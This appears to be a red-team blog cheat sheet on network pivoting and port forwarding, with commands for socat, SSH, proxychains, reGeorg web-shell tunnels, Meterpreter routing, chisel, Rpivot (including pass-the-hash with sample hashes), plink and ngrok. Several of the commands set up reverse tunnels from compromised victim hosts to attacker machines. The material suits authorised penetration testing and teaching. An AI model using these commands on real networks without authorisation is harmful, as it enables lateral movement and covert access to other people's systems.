Pivoting & Port forwarding methods – part2

This blog will focus on port forwarding concepts. Here are some methods we will follow in this blog : –

• socat
• windows Netsh
• SSH
• proxychains
• Web Socks
• Metasploit
• sshuttle
• chisel
• Rpivot
• Plink
• Ngrok

SOCAT

To install socat, we simply run:

sudo apt-get updatesudo apt-get install socat

To run socat and forward traffic from your internet node IP 112.72.6.1 port 808 to remote node 62.41.90.2 port 443 run the following command:

socat TCP4-LISTEN:808,fork TCP4:62.41.90.2:443

To forward traffic from your internet node from port 9090 to remote node 62.41.90.2 port 22 and forward traffic from port 81 to port 21 on ftp.microsft.com run the following command:

socat TCP4-LISTEN:9090,fork TCP4:62.41.90.2:22|socat TCP4-LISTEN:81,fork T CP4:ftp.microsft.com:21 

Windows Netsh Port Forwarding

netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport

netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110

1. listenaddress – is a local IP address waiting for a connection.
2. listenport – local listening TCP port (the connection waits on it).
3. connectaddress – is a local or remote IP address (or DNS name) to which the incoming connection will be redirected.
4. connectport – is a TCP port to which the connection from listenport is forwarded to.

SSH

SOCKS Proxy

ssh -D8080 [user]@[host]

ssh -N -f -D 9000 [user]@[host]
-f : ssh in background
-N : do not execute a remote command

Cool Tip: Konami SSH Port forwarding

[ENTER] + [~C]
-D 1090

Local Port Forwarding

ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]

Remote Port Forwarding

ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
ssh -R 3389:10.1.1.224:3389 [email protected]

proxychains

Config file: /etc/proxychains.conf

[ProxyList]
socks4 localhost 8080

Set the SOCKS4 proxy then proxychains nmap -sT 192.168.5.6

Web SOCKS – reGeorg

reGeorg, the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.

Drop one of the following files on the server:

• tunnel.ashx
• tunnel.aspx
• tunnel.js
• tunnel.jsp
• tunnel.nosocket.php
• tunnel.php
• tunnel.tomcat.5.jsp

python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp # the socks proxy will be on port 8080

optional arguments:
  -h, --help           show this help message and exit
  -l , --listen-on     The default listening address
  -p , --listen-port   The default listening port
  -r , --read-buff     Local read buffer, max data to be sent per POST
  -u , --url           The url containing the tunnel script
  -v , --verbose       Verbose output[INFO|DEBUG]

Metasploit

# Meterpreter list active port forwards
portfwd list 

# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
portfwd add –l 3389 –p 3389 –r target-host 
portfwd add -l 88 -p 88 -r 127.0.0.1
portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445

# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
portfwd delete –l 3389 –p 3389 –r target-host 
# Meterpreter delete all port forwards
portfwd flush 

or

# Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0
run autoroute -s 192.168.15.0/24 
use auxiliary/server/socks4a

# Meterpreter list all active routes
run autoroute -p 

route #Meterpreter view available networks the compromised host can access
# Meterpreter add route for 192.168.14.0/24 via Session number.
route add 192.168.14.0 255.255.255.0 3 
# Meterpreter delete route for 192.168.14.0/24 via Session number.
route delete 192.168.14.0 255.255.255.0 3 
# Meterpreter delete all routes
route flush 

sshuttle

The transparent proxy server that works as a poor man’s VPN. Forwards over ssh.

• Doesn’t require admin.
• Works with Linux and macOS.
• Supports DNS tunnelling.

pacman -Sy sshuttle
apt-get install sshuttle
sshuttle -vvr [email protected] 10.1.1.0/24
sshuttle -vvr username@pivot_host 10.2.2.0/24 

chisel

go get -v github.com/jpillora/chisel

# forward port 389 and 88 to hacker computer
user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:389 
user@hacker$ /opt/chisel/chisel server -p 8008 --reverse

Rpivot

Server (Attacker box)

python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0

Client (Compromised box)

python client.py --server-ip <ip> --server-port 9443

Through corporate proxy

python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e

Passing the hash

python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe \
--hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE

plink

# exposes the SMB port of the machine in the port 445 of the SSH Server
plink -l root -pw toor -R 445:127.0.0.1:445 
# exposes the RDP port of the machine in the port 3390 of the SSH Server
plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389  

plink -l root -pw mypassword 192.168.18.84 -R
plink.exe -v -pw mypassword [email protected] -L 6666:127.0.0.1:445

plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP]
# redirects the Windows port 445 to Kali on port 22
plink -P 22 -l root -pw some_password -C -R 445:127.0.0.1:445 192.168.12.185   

ngrok

# get the binary
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
unzip ngrok-stable-linux-amd64.zip 

# log into the service
./ngrok authtoken 3U[REDACTED_TOKEN]Hm

# deploy a port forwarding for 4433
./ngrok http 4433
./ngrok tcp 4433

| Sensitive Content|

For my time in the labs, I started out using single-hop local SSH forwards through a pivot point that I had owned in the remote network. This works just fine if you know that port 80 is open and all you want to do is connect to port 80 inside a network you don’t have direct access to. That looks something like:

ssh [email protected] -L 81:10.71.1.28:80

Later on, I learned to do more dynamic SSH forwards with proxychains:

PROXYCHAINS

I used a dynamic ssh tunnel via John:
ssh -f -N -D 127.0.0.1:9050 [email protected] -p 22000
Tested with :
proxychains nmap 10.2.2.15 -sT -Pn

ssh -f -N -D 127.0.0.1:9050 [email protected]
leafpad /etc/proxychains.conf
proxychains ssh -f -N -D 127.0.0.1:9055 [email protected] -p 222
leafpad /etc/proxychains.conf
proxychains ssh [email protected]

And even later, I did double pivoting using proxychains:

ssh -tt -L8080:localhost:8157 [email protected] ssh -t -D 8157 [email protected] -p 222
set up proxychains to use our forwarded port 8080:
leafpad /etc/proxychains.conf
strict_chain or dynamic_chain
socks4 127.0.0.1 8080

Basic Pivoting Types

Type	Use Case
Listen – Listen	Exposed asset, may not want to connect out.
Listen – Connect	Normal redirect.
Connect – Connect	Can’t bind, so connect to bridge two hosts

Listen – Listen

Type	Use Case
ncat	ncat -v -l -p 8080 -c "ncat -v -l -p 9090"
socat	socat -v tcp-listen:8080 tcp-listen:9090
remote host 1	ncat localhost 8080 < file
remote host 2	ncat localhost 9090 > newfile

Listen – Connect

Type	Use Case
ncat	ncat -l -v -p 8080 -c "ncat localhost 9090"
socat	socat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090
remote host 1	ncat localhost -p 8080 < file
remote host 2	ncat -l -p 9090 > newfile

Connect – Connect

Type	Use Case
ncat	ncat localhost 8080 -c "ncat localhost 9090"
socat	socat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090
remote host 1	ncat -l -p 8080 < file
remote host 2	ncat -l -p 9090 > newfile

References

• Network Pivoting Techniques – Bit rot
• Port Forwarding in Windows – Windows OS Hub
• Using the SSH “Konami Code” (SSH Control Sequences) – Jeff McJunkin
• A Red Teamer’s guide to pivoting- Mar 23, 2017 – Artem Kondratenko
• Pivoting Meterpreter